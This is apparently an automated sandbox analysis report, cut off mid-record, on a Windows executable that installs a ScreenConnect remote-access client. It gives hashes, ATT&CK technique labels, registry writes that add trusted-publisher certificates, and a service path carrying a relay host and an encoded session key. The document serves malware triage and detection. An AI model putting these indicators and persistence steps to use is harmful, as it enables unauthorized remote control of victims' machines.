5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855ea

Analysis

max time kernel
97s
max time network
114s
platform
windows10-2004_x64
resource
win10v2004-20240910-en
resource tags

arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
submitted
30-09-2024 13:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe
Size

81KB
MD5

c9c295cbbea61de3a33c75b842c28290
SHA1

d184c0191defbd0d91445da0be3b1a7619facf13
SHA256

5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855ea
SHA512

77d58d62d9969ee87958d935e416afcea2ab9bffe5d5ba045eb550cc0eea8cb7260430eb24e2049db371e83fe580988415ed55d222b9cc8036b812fbb7df3087
SSDEEP

1536:ZoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYF7dxD4:jenkyfPAwiMq0RqRfbaxZJYYFE

Score

8^/10

discovery persistence

Malware Config

Signatures

Manipulates Digital Signatures 1 TTPs 3 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (d81fd4da-4864-4170-8493-5caf31237e57)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\LVX18O3A.K62\\9QKX5D8W.860\\scre..tion_25b0fbb6ef7eb094_0018.0002_37b206287e3c9de1\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=instance-t05s5f-relay.screenconnect.com&p=443&s=d81fd4da-4864-4170-8493-5caf31237e57&k=BgIAAACkAABSU0ExAAgAAAEAAQBlHMVT0gDlt4iBvE2M08DinJk09duqeN7P3B9ZozHg6zmMk7TDk%2fp%2bs%2fhn8wcfWtSbRD7vAU0tGRe4%2fOioyUVjXuJgF6CPbuK%2bhFRSeW1taH5%2f9xmNWSyLKnQe16feUcLW0KVmUcqwjsJ8WmYcr4xYT736wTljgrumj14i676u%2fjyncMEijebFAdQ3l5Njx%2f0ZC3pg9hQMNAyzlcF%2fjQKaiusUypKBIR2%2f2f2Aq9N6E1p3yCiSJY1%2bhXFT1kBIV0rC%2fRAtPVMZjraVkv34tDzqwwHFIpDig2KjE0Dymz%2b3%2fYVLOcVlk0O7O5fNEA%2foBItJjIS934homoR8qS2Uwfa3&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAyG%2fjQs%2bK%2f06HYuuDZUMkoAAAAAACAAAAAAAQZgAAAAEAACAAAADfiBf7WPjnYeVwoEQhmqUnQ6H0W70wttfPjyx6PvRYFwAAAAAOgAAAAAIAACAAAACnrIMLTybhOIDf7DD1vlCWBCMPwT22xMJKrvci1Fi366AEAADiBYVtcrs9PDpTQZVOxoH8twnFRghaDQIaMd%2fqlxwpaIF8jfxt1AL%2fHv2prpoF18yhpyVczJ8mhna3XeOAwuMnJlrrUSNS4KrJfYxjD8LhPmL5XvkprIeuDtrSRTBJgTp0Y3Z0RS9oaWfxDkew67jvSc2hSZ6hw7WTrzMhreNmPX8pq9VCEx%2bvStTalMeVM%2f984I3WdYSNuFSuNtutC2FLFcz88Vyq0yoN8nubpnvO30vBWPUBqPj6LpQp5r84gzVfJY5HSBXNe6i67WNASubQ4udvwSGY3Fr9tCDbmRJeM1CNV%2b%2bm7iHxRi%2bWz3%2f5%2brLKyjhvSEMrCm0MwiaNoW1pMPQjwXFpg2OF2SuTBG64ff5rJPOUfXUz95yhvVqPS%2fs7aM4bQ3imWGtKHh9X9cvLm%2bJ%2fW9z8XzJaw7GY8fmsc8Qzu9F5eVd7pattY3gyWIOlxKKGu3pWEXJEA3gZV8vb6UUwFYVVVKIUI64Va4S9qFQqQN53Z2M9ju8FgTWQLNGPduSEqAQpT47kO8fIFO%2fKswqd8Je2%2f6bqMEoHKZSVZ95N8PHdDorOt%2faCN0dCoGmiNRFvCtu1ea6JujjpVy0FYB0ESQ2%2fuWkb8dKoY1DzR8%2bmRuLsCbJrfP4JxeHQOeG9XmFAlodzvk%2fVv4BLtoOBv1DPACc9iglOmdi0OY1F2FTT2ZvpkoVVr8ESSDYiTNcW3ufN%2bVJBgNi4kOMescIgnoSQsCEyoOkdc5IQqAM41Ub5FgKcUCMnPLfzJo8NUSAgnkXBDn1ePSDK6LWcoagQoOx9JZ1PxRRnKwVyuB2ySZ4D1aILV2CgwCNgIYf5R14MGINv6KDXegtFm%2fWaxpd4pKV%2b%2fqdhR1hIdxmyFUHNzT4ShzA900WQA4zXN%2f80QgQi4VqntgN21%2ftCN8dV6XA9A2%2b8r6dMNHCeibjey3ivxHpvoVwUK12hFV6lp4y3To4%2by7qOP3Y%2foAbYUWZDwR%2bZSkxiMi7PvaG6VY8E7zbT4P%2b%2bY%2flNyuCtsbVjBUj0qD02Th7MKSsHoimchYzbhC8tSx%2bR6n01VSBnM%2f8%2fV%2fYdjRA2K5QIOWzgl7HvomKM7eGVbv5xxjixB5ZeqrdieWZdZ9g4WlLnDhubVHLhyRu5KqUqiMi61IolCh47k7aHgq3TsoSvOjjfwa6%2b24YEHAcYBsHvUtxaBZqhX86oKD%2fkew52pNYn0yd%2f2byllflR67phhepCtk033iWGEVPvJm9IoBQSBxGz62DmVGlUcnBMPOtoNkbxAeFyGi%2bAkDOcOWc%2f%2fyBdRDaKC%2f8h04QwejnN%2bZWy0oWDAwW50dXT9OOy1bfp5E5rnb4i0Kc53fPJ225AGnpAWEP229cZ%2b75GkkTq%2b5ahB4itj3KBYU6jEZvNrxYotruC5B5U1IC%2bEcgubfRUjnRFoHkgNqr9hQefy4H2PqTo3AYjHqwLxlK3Syp6PeDraGBxo%2fk8DCabRkqG1xECeEjwFbY8zP%2fH5uS1QnnTM2KO6TxlGDKQOKglRBCtDSshuN44xkR47TojIgEOt5bjsVHscrP%2bS1%2brMC%2bqqZu6J32n0ZFPirms5MLRN3kvjEAAAACofG4i%2fMMti0d%2b7dtI0NYe3GzYgtO86BFYp4GETClzrGbHg3GWQhJPLPAb%2f7dndLrHgVyJYX3M0DcTvL8i4SF%2b&r=&i=\" \"1\""	ScreenConnect.ClientService.exe

Downloads MZ/PE file

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe

Executes dropped EXE 4 IoCs

pid	Process
3004	ScreenConnect.WindowsClient.exe
3872	ScreenConnect.ClientService.exe
1020	ScreenConnect.ClientService.exe
1016	ScreenConnect.WindowsClient.exe

Loads dropped DLL 16 IoCs

pid	Process
3872	ScreenConnect.ClientService.exe
3872	ScreenConnect.ClientService.exe
3872	ScreenConnect.ClientService.exe
3872	ScreenConnect.ClientService.exe
3872	ScreenConnect.ClientService.exe
3872	ScreenConnect.ClientService.exe
1020	ScreenConnect.ClientService.exe
1020	ScreenConnect.ClientService.exe
1020	ScreenConnect.ClientService.exe
1020	ScreenConnect.ClientService.exe
1020	ScreenConnect.ClientService.exe
1020	ScreenConnect.ClientService.exe
1020	ScreenConnect.ClientService.exe
1020	ScreenConnect.ClientService.exe
1020	ScreenConnect.ClientService.exe
1020	ScreenConnect.ClientService.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3044	4808	WerFault.exe	83

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\SizeOfStronglyNamedComponent = 64f8010000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files\ScreenConnect.WindowsClient.exe.config_f7f = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\SizeOfStronglyNamedComponent = b021010000000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_0f31d91240bd83db	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_acde72cb5eb3cdc9	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\VisibilityRoots	ScreenConnect.WindowsClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\ComponentStore_RandomString = "LVX18O3AK629QKX5D8W860A6"	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 0000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 680074007400700073003a002f002f0068006f00740065006c00640065006c00610070006c006100670065002d007000690072006900610063002e00730063007200650065006e0063006f006e006e006500630074002e0063006f006d002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e00330032000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_37b206287e3c9de1	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\lock!04000000cccb570ebc0b00007c1200000000000000000000 = 30303030306262632c30316462313334306137393135653862	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\NonCanonicalData	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb0 = 3c004100700070006c00690063006100740069006f006e00540072007500730074002000760065007200730069006f006e003d002200310022000d000a00460075006c006c004e0061006d0065003d002200680074007400700073003a002f002f0068006f00740065006c00640065006c00610070006c006100670065002d007000690072006900610063002e00730063007200650065006e0063006f006e006e006500630074002e0063006f006d002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e003300320022000d000a00540072007500730074006500640054006f00520075006e003d002200740072007500650022000d000a0050006500720073006900730074003d002200740072007500650022003e000d000a003c00440065006600610075006c0074004700720061006e0074003e000d000a003c0050006f006c00690063007900530074006100740065006d0065006e0074002000760065007200730069006f006e003d002200310022003e000d000a003c005000650072006d0069007300730069006f006e00530065007400200063006c006100730073003d002200530079007300740065006d002e00530065006300750072006900740079002e005000650072006d0069007300730069006f006e0053006500740022000d000a00760065007200730069006f006e003d002200310022000d000a00490044003d00220043007500730074006f006d0022000d000a00530061006d00650053006900740065003d002200730069007400650022000d000a0055006e0072006500730074007200690063007400650064003d002200740072007500650022000d000a0078006d006c006e0073003a00610073006d00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600310022000d000a0078006d006c006e0073003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a00610073006d00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a007800730069003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300031002f0058004d004c0053006300680065006d0061002d0069006e007300740061006e006300650022000d000a0078006d006c006e0073003a0063006f002e00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600310022000d000a0078006d006c006e0073003a00610073006d00760033003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600330022000d000a0078006d006c006e0073003a0064007300690067003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300030002f00300039002f0078006d006c006400730069006700230022000d000a0078006d006c006e0073003a0063006f002e00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600320022003e000d000a003c0049005000650072006d0069007300730069006f006e00200063006c006100730073003d002200530079007300740065006d002e004e00650074002e005700650062005000650072006d0069007300730069006f006e002c002000530079007300740065006d002c002000560065007200730069006f006e003d0032002e0030002e0030002e0030002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d00620037003700610035006300350036003100390033003400650030003800390022000d000a00760065007200730069006f006e003d002200310022003e000d000a003c0043006f006e006e006500630074004100630063006500730073003e000d000a003c0055005200490020007500720069003d00220028006800740074007000730029003a002f002f0068006f00740065006c00640065006c00610070006c006100670065005c002d007000690072006900610063005c002e00730063007200650065006e0063006f006e006e006500630074005c002e0063006f006d002f002e002a0022002f003e000d000a003c002f0043006f006e006e006500630074004100630063006500730073003e000d000a003c002f0049005000650072006d0069007300730069006f006e003e000d000a003c002f005000650072006d0069007300730069006f006e005300650074003e000d